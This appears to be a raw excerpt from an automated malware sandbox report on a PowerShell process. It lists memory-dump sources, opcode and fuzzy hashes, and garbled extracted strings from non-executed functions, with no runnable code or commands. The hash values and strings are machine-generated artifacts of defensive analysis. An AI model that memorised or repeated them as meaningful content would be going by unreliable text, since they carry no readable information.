                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79c2b846a0e6264fa457ed9357c2b9e496fb10da66a3f35660fbd74e79e1c858
                                    • Instruction ID: 9852590b5e03dbb4995746a7584f94df53b602f5c0d9f7c88fb87f23547c1079
                                    • Opcode Fuzzy Hash: 79c2b846a0e6264fa457ed9357c2b9e496fb10da66a3f35660fbd74e79e1c858
                                    • Instruction Fuzzy Hash: B0224D74A05304EFD744CB98C951FAABBB2EF89318F158059E9059F391CB72EC42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 88fa63b85572824fa57772dae16ffd5ed0093be0676a1f376ab6ba2290271df5
                                    • Instruction ID: ae2415c98c75006a9fa97dbf930ce5681ec85576abd9ebb3d15e6e32094a9638
                                    • Opcode Fuzzy Hash: 88fa63b85572824fa57772dae16ffd5ed0093be0676a1f376ab6ba2290271df5
                                    • Instruction Fuzzy Hash: 55F12974A01304DFD754CB98C591FAABBB2BB88319F24D059E9059F3A5C772EC42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 53fee9242346a686c5f090ad54dbfebe3a0723e14a84b54f120d6a708ca79e66
                                    • Instruction ID: ec75be21950aa152e5fb539a726c76a87fcec95508dc91aa7f85c5f9fc58e5b8
                                    • Opcode Fuzzy Hash: 53fee9242346a686c5f090ad54dbfebe3a0723e14a84b54f120d6a708ca79e66
                                    • Instruction Fuzzy Hash: 5CE13A74B003049FE754CF98C551FAABBA2EB88318F14D069EA05AF395C776ED42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 98ef49485aa2e6e807e9b49fb66cad7f3b2db12dbb4072b827e430301dda667f
                                    • Instruction ID: 67a521bb3f1dcf326760c42aa5438cc2aaaef1111472604cb2325ec5f94d3791
                                    • Opcode Fuzzy Hash: 98ef49485aa2e6e807e9b49fb66cad7f3b2db12dbb4072b827e430301dda667f
                                    • Instruction Fuzzy Hash: 9AE12A74A013049FD754CF98C541AAABBB2FF88318F14D06AEA15AF395C772ED42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 78fbd8193fd556ee81239075cd5f18e6048e207e3c370b434bb21475f33647d6
                                    • Instruction ID: c417b2f51d14a8e4fa1b875c0dc96cc4e22534ab1e8f23f2841dfe7828b53e94
                                    • Opcode Fuzzy Hash: 78fbd8193fd556ee81239075cd5f18e6048e207e3c370b434bb21475f33647d6
                                    • Instruction Fuzzy Hash: 23C1D274A11219EFDB15CFA8D584A9DBBF2EF88311F248199E805AB351C731ED86CB90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3c927ea6c46523841b771feb1f55a501fcaa172fc6e58916cc1016810fa8c208
                                    • Instruction ID: a14ee74401c36be4d3bb77b0b70593a16ad4492bbff1029a0c2519103c5c2456
                                    • Opcode Fuzzy Hash: 3c927ea6c46523841b771feb1f55a501fcaa172fc6e58916cc1016810fa8c208
                                    • Instruction Fuzzy Hash: 7DA18C31A002489FDB14DFA4D994E9DBBF2FF84301F254598E816AF265DB74AD89CB80
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6698f54234df4a43d944cc1d83308de860e4f0935c750c70c064d41ac607acfa
                                    • Instruction ID: e25994b3d56ea720b48010c344b028e15da2d71680adefea8b5e1bd9d4a86b8e
                                    • Opcode Fuzzy Hash: 6698f54234df4a43d944cc1d83308de860e4f0935c750c70c064d41ac607acfa
                                    • Instruction Fuzzy Hash: D1917D74A016058FCB05CF59C594AAEFBF1FF89310B2486A9D855AB3A5C736FC41CBA0
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48c1ba8e35a32e07592ba92094b3ba0d39d94966660e3f6fbfc3e9b43201a164
                                    • Instruction ID: fc984fa410147e89312b2c96b48abf343de9d1428f63c47bc14badb0253edb91
                                    • Opcode Fuzzy Hash: 48c1ba8e35a32e07592ba92094b3ba0d39d94966660e3f6fbfc3e9b43201a164
                                    • Instruction Fuzzy Hash: 9C713E30A002489FDF15DFA8D594BADBBF6FF88305F1484A9D811AB790DB71AD4ACB50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72c36e405da0b3b57d5d43980807d8f6866f2144009c2dda8052b6c1a611811a
                                    • Instruction ID: 08c50533155629b3d02cd6d7e4f8e11bf66909dd6df199bfe258cdd215d054d7
                                    • Opcode Fuzzy Hash: 72c36e405da0b3b57d5d43980807d8f6866f2144009c2dda8052b6c1a611811a
                                    • Instruction Fuzzy Hash: 2E611774A10204EFE754CB94C551EAAB7B2AB88309F25D069E9059F391CB72EC42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e431c6bdec429a83d8b249e1c2a568391649d1ce7226fe3a151b0c03b01edbac
                                    • Instruction ID: 6a9ce51aa3744e83fdef7ea1a85650296c2e8f8c88af1e321cc9c1b4ded91f84
                                    • Opcode Fuzzy Hash: e431c6bdec429a83d8b249e1c2a568391649d1ce7226fe3a151b0c03b01edbac
                                    • Instruction Fuzzy Hash: ED612874A10205EFD754CB98C551EAAB7B2FB88309F24D069E9059F391CB72EC42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c74467c1ac5ecb8d92e9a77bad6264a9eccc79614b91df8555a19245adbe2cf
                                    • Instruction ID: 6342d2637a6bf92b872d552458c462279834b6e71d40cf79ec181b90699e1d27
                                    • Opcode Fuzzy Hash: 0c74467c1ac5ecb8d92e9a77bad6264a9eccc79614b91df8555a19245adbe2cf
                                    • Instruction Fuzzy Hash: 5C517DB190D3C09FDB03DB68C8A4699BFB0AF57210B0A40D7D494DF2A3D625DC49CBA6
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d6738c9ef1b59b09b6c9c49cace8f1bd95a38f9ef2d421c59718bc0eb3516919
                                    • Instruction ID: ce8d753437b8ba45e978f5800d55f6b89fba0bc0f93f2a79b7b59c4198e956d5
                                    • Opcode Fuzzy Hash: d6738c9ef1b59b09b6c9c49cace8f1bd95a38f9ef2d421c59718bc0eb3516919
                                    • Instruction Fuzzy Hash: 32512C34A01218DFCB14DFA8D5849EDBBF2FF49311B2585A9E405AB361D731ED89CB50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a274f2f952da89e75d613679164ac0dbb5753c281fc4fa130fde6ea2f456b20
                                    • Instruction ID: b06c7e378fe05f298b0e80a3ab521dc17856ec1592a5482bc2aab1d812def45d
                                    • Opcode Fuzzy Hash: 0a274f2f952da89e75d613679164ac0dbb5753c281fc4fa130fde6ea2f456b20
                                    • Instruction Fuzzy Hash: 5A51BF30A043848FDB15DFA8C894BDDBBF2BF85305F1584AAD441AB2A2DB749D49CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 11279e49138c870b4ac108ff0d69a69a0058780206c300d07fc17614eaebdd7a
                                    • Instruction ID: b028715bc098c87cd3d5fcfe1f8f09c40a9c79959e02845d7307806030cd02c9
                                    • Opcode Fuzzy Hash: 11279e49138c870b4ac108ff0d69a69a0058780206c300d07fc17614eaebdd7a
                                    • Instruction Fuzzy Hash: 47415D70A00258DFDB14DFA9C984B9DBBF6FF84305F1484A9D405AB7A1DBB0AD45CB80
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d06e0323a1ac3f394d3661de36ecf2ba820b9623765e5170a8c6c93ad2f9d97c
                                    • Instruction ID: ee9bd459393acc7fe0058a5a5f3dc12d0506827c45d823e9af5e93b1ca6335f3
                                    • Opcode Fuzzy Hash: d06e0323a1ac3f394d3661de36ecf2ba820b9623765e5170a8c6c93ad2f9d97c
                                    • Instruction Fuzzy Hash: EE414C70A002589FDB14DFA9C984B9DBBF6FF84305F148469D405AB7A0DFB0AD45CB80
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f81169af2b91b02527a833ba92e4847671009606a6bc1f1fd52af4403dd334cd
                                    • Instruction ID: f8936ec2dc207422b4f99f5d5b0cdc7ab9055557c0f11af3cdc3771cc9647e63
                                    • Opcode Fuzzy Hash: f81169af2b91b02527a833ba92e4847671009606a6bc1f1fd52af4403dd334cd
                                    • Instruction Fuzzy Hash: 74413F316002549FDB14DBA4D998FAEBBF2FF88755F1840ACE806AB7A0CB719C45CB50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2012e158ad1cd6fea420e9d45960d09ad0f8b54d82927a77993300c9081587d1
                                    • Instruction ID: 28d507ea8299e2f381ae50b5e6c166ddad47e18767e17d2616f6c028298d09c1
                                    • Opcode Fuzzy Hash: 2012e158ad1cd6fea420e9d45960d09ad0f8b54d82927a77993300c9081587d1
                                    • Instruction Fuzzy Hash: 2231E4B1F00304DFDBA4CE658541ABA77A2AF8824CF1A9469D9019F361FB35DC43C7A1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 68c7bbc14810a2152993fffd70eab6f73bb6daf773aae04bf3d19c743e0dc7f6
                                    • Instruction ID: 3ec231c37821b6b680448e22358cde5254f543fd0d171f10e3ded0e49be50508
                                    • Opcode Fuzzy Hash: 68c7bbc14810a2152993fffd70eab6f73bb6daf773aae04bf3d19c743e0dc7f6
                                    • Instruction Fuzzy Hash: 0D31F2B5A043859FCB02CF58C894A99BBB1FF59310B1541DAD844EB352D335EC05CBA1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ccaa28c407c565f61f6bc6207a3b2b5ae366c92aeb08f326b4d7087f2cc02870
                                    • Instruction ID: 3d0972b8d221f90ac2646da29425fc9332e6b7f799a2c9aedced5e16c1f6d8cd
                                    • Opcode Fuzzy Hash: ccaa28c407c565f61f6bc6207a3b2b5ae366c92aeb08f326b4d7087f2cc02870
                                    • Instruction Fuzzy Hash: 49319274A012599BDB26CF68C98169EB7F2FF45301F5441A9EC01AB741EB70EC8ACB90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b2d9a2d2676faacd8afdfc57e18507218e6baf8fb77603faae26ef84933a40ce
                                    • Instruction ID: 50725dcdd4976e487d04262a152de4b39558c173575bba6c22a1e00a3d058a7b
                                    • Opcode Fuzzy Hash: b2d9a2d2676faacd8afdfc57e18507218e6baf8fb77603faae26ef84933a40ce
                                    • Instruction Fuzzy Hash: 8E21C571E11349ABCF15CF64D8416DFBBF1EF45301F5045AAEC01BB641EB70984A8B90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76422788eb0a4b179a9f486f4f041bda4430667d2e11815fab43a752af823749
                                    • Instruction ID: 0518c67f2a4b8659f64a6d7b8c02161b77c20081e5ad6332e8781f8d0eb19398
                                    • Opcode Fuzzy Hash: 76422788eb0a4b179a9f486f4f041bda4430667d2e11815fab43a752af823749
                                    • Instruction Fuzzy Hash: 6521F874A00609DFDB04CF89C594AAAFBF1FF48310B1585A9E909A7751D735EC51CBA0
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e4fa49a32f1f65e78c82ed64936de79a2525c3b6e5902702003dd52418799596
                                    • Instruction ID: 1314082df31d01d2681bbb00f81fd65f41f4b79ed20a13b522e76dbcd42b5b0b
                                    • Opcode Fuzzy Hash: e4fa49a32f1f65e78c82ed64936de79a2525c3b6e5902702003dd52418799596
                                    • Instruction Fuzzy Hash: 151148716053409FC722572CD9116AFBBE2DF81316B640AFED852D7A51DB34980EC7D0
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c4a953695d0e0ce097b2d0c0245b038f53e74763d74153008b76b5b61f439c6
                                    • Instruction ID: ca1b3b02eb13773d88a7ee74c922c7e970f11ed0acca4d5dc0547ef62d914943
                                    • Opcode Fuzzy Hash: 4c4a953695d0e0ce097b2d0c0245b038f53e74763d74153008b76b5b61f439c6
                                    • Instruction Fuzzy Hash: C6014F78A002149FDB04DB98C9906EDF7B5FF8D300B248199D85A97361CA36EC078B50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080662428.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_abd000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8f9678647dccd5b60e860da708b312c718f8ffac5fad6d6fb86fc47655fd2ee9
                                    • Instruction ID: 656ae83b923676d121e97ac07779e13989c13aafa670d8383726c5a4fb4e9022
                                    • Opcode Fuzzy Hash: 8f9678647dccd5b60e860da708b312c718f8ffac5fad6d6fb86fc47655fd2ee9
                                    • Instruction Fuzzy Hash: 1301F271405340AAE7206B25CD84BA7FFECEF41364F18C02AED0A4B243D279D942CAB2
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 31fe094dbf94956bd52d323908e21b76bd05f22463083f79fb61a35d785bf4d8
                                    • Instruction ID: a29114e27df0d5bb0d8d0c9db607ae0d9784f22f71e93814d8d33892dbfce8a5
                                    • Opcode Fuzzy Hash: 31fe094dbf94956bd52d323908e21b76bd05f22463083f79fb61a35d785bf4d8
                                    • Instruction Fuzzy Hash: 9401E4B9E0020A9FC741DF68D485A9EBBF4FF08310F5041A9EA09EB362D730A955CBD1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080662428.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_abd000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1815b0daecca08de4db080823d08e23dbc22f36e88608ac30eaa102d652b9032
                                    • Instruction ID: 0af221e76229be3c817c71873e67c914ee0202aa50ce63e2ff8350e3328b12a4
                                    • Opcode Fuzzy Hash: 1815b0daecca08de4db080823d08e23dbc22f36e88608ac30eaa102d652b9032
                                    • Instruction Fuzzy Hash: 20F0AF72405240AEE7108B16C884BA2FFDCEB41324F18C05AED591A282C2799845CAB1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ee5de7726743ef38818e8d6ba9d5f3b39b57807841d46b667fd672b70c0d7dc
                                    • Instruction ID: ec035e5fa5dbf2cab8f7673a847225d400fe1bada1a1ab1409df0a642f501a3f
                                    • Opcode Fuzzy Hash: 1ee5de7726743ef38818e8d6ba9d5f3b39b57807841d46b667fd672b70c0d7dc
                                    • Instruction Fuzzy Hash: C6F0B432A003009F83556B6CA44911BBBD6EEC43923644AF9D847C7700DB31EC0ECBE1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62ae6ce3df8146fb9707ebda4bfd23c9720257ec619d3e030adc36db0d04ccb1
                                    • Instruction ID: 002dfe864e1cfb04bbc6622bbf506b8b5c44d635831b3e2d64ad4aefa9f9ceb9
                                    • Opcode Fuzzy Hash: 62ae6ce3df8146fb9707ebda4bfd23c9720257ec619d3e030adc36db0d04ccb1
                                    • Instruction Fuzzy Hash: 1FF097B4E0420ACFC780DF68C485AAEBBF4BF49310F505199D909EB321D631A945CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8a87715feeda87e31dc92cdcdc9f498a61b6c232aa1eb7e710a94cdb7c7091e9
                                    • Instruction ID: 1b1105bfcac39a27232a45f5439000fe603d0c3665bcd8f0ea70c5bc78e25a23
                                    • Opcode Fuzzy Hash: 8a87715feeda87e31dc92cdcdc9f498a61b6c232aa1eb7e710a94cdb7c7091e9
                                    • Instruction Fuzzy Hash: 1BF0393060A381DFD3528B50C854A21BBB2EB93208F19D0DED585CF1ABC736988BCB52

                                    Non-executed Functions

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$tP;r$tP;r$tP;r$tP;r$$;r$(Ar$(Ar$(Ar$(Ar
                                    • API String ID: 0-1290985801
                                    • Opcode ID: 261430da00639eefd3e0b73300b7b14a12b8f8f2d6273a5dfd3fd8fcc21d96f0
                                    • Instruction ID: c1cfb3af8f2b230e7f2e8c80f810a01c96c680d4e1651f5ddfae65bd709def53
                                    • Opcode Fuzzy Hash: 261430da00639eefd3e0b73300b7b14a12b8f8f2d6273a5dfd3fd8fcc21d96f0
                                    • Instruction Fuzzy Hash: 3BA1E934B103159FDBA4DF68C508BAEB7A6EF84354F249469E905AF381DB31DC42C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$TQ@r$TQ@r$TQ@r$tP;r$tP;r$$;r$$;r$$;r$$;r
                                    • API String ID: 0-3937178252
                                    • Opcode ID: c085c78fa3a986c786e026e77f96a7898859ea43c36109e5e883ab6340630fe3
                                    • Instruction ID: b4aa985b139dde53c681e36e3228d620502484c7c6bc58718a9f69b941baf469
                                    • Opcode Fuzzy Hash: c085c78fa3a986c786e026e77f96a7898859ea43c36109e5e883ab6340630fe3
                                    • Instruction Fuzzy Hash: 4D81C331B00305DFEBA99F58C50C7BA77A6AF84318F249569E8069F690CB36DC47C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$tP;r$tP;r$t~Nr$$;r$$;r$$;r$$;r
                                    • API String ID: 0-1020809138
                                    • Opcode ID: 9a743c4a0b9704afe526325c7c186412df9af8b761531574537f984b9e737628
                                    • Instruction ID: 0908739831b29ca0222bf3b1600d80fd1c275370aa49d6a746dfa2c34844997a
                                    • Opcode Fuzzy Hash: 9a743c4a0b9704afe526325c7c186412df9af8b761531574537f984b9e737628
                                    • Instruction Fuzzy Hash: DFB13931F003059FEBA59B6985007AAB7E6AFC5214F24947AD605DF291DB32CD43C7E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$d%Ar$d%Ar$d%Ar$d%Ar$tP;r$tP;r$$;r
                                    • API String ID: 0-3149113169
                                    • Opcode ID: 22d82d79b4970f10140e3ecae47f4e493fc9cfd8cd1186c6bed87c3c8b0be30d
                                    • Instruction ID: b2995a00ec4883f6f325dbfa629443bff287722cfef3c1dd3aa11e194079320e
                                    • Opcode Fuzzy Hash: 22d82d79b4970f10140e3ecae47f4e493fc9cfd8cd1186c6bed87c3c8b0be30d
                                    • Instruction Fuzzy Hash: 7271C630F00315DFDBA49E64CD14BAAB7A6AFC8354F249169E8059B391DB31DD42CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r$$;r$$;r$$;r$$;r
                                    • API String ID: 0-1150055375
                                    • Opcode ID: cdb2e472a3bd1f004e2e65413545373aee366c61c7c5477226a95224b28795c4
                                    • Instruction ID: 63c73bc431b56539d87bd39a39d28cfdb2837932c0688cffc061105fb8631785
                                    • Opcode Fuzzy Hash: cdb2e472a3bd1f004e2e65413545373aee366c61c7c5477226a95224b28795c4
                                    • Instruction Fuzzy Hash: B3F16E35B04341DFDB949F69C9507BABBA6EFC5214F2484BAE805CF241DB36D806C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r$$;r$$;r$$;r$$;r
                                    • API String ID: 0-1150055375
                                    • Opcode ID: a274e774be40f44327152e00a564f097a5cee6002beead43f432bbbaf80f6395
                                    • Instruction ID: 4025da974fb5c8312630910e280813d5642ff994aabfbbcf6e7220d27db2932b
                                    • Opcode Fuzzy Hash: a274e774be40f44327152e00a564f097a5cee6002beead43f432bbbaf80f6395
                                    • Instruction Fuzzy Hash: 29412839B00745EFEBA84E19D844B6777A9AF82225F24947AE405CBAC1DB35C843C793
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$4';r$XR@r$x.k$-k
                                    • API String ID: 0-2177826503
                                    • Opcode ID: 60f1c65829a91a4dc4069a2fbe0c766c030194e8bc32910e52d62f81095a422e
                                    • Instruction ID: 4bbb5908f023f0bf5ce6879e7100098226b15ae45d002f31f7667ca2cfdc892c
                                    • Opcode Fuzzy Hash: 60f1c65829a91a4dc4069a2fbe0c766c030194e8bc32910e52d62f81095a422e
                                    • Instruction Fuzzy Hash: 48F1C434E003049FDB64DB54C955BAEB7B6AF88318F248529D4066FB95CB36EC43CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
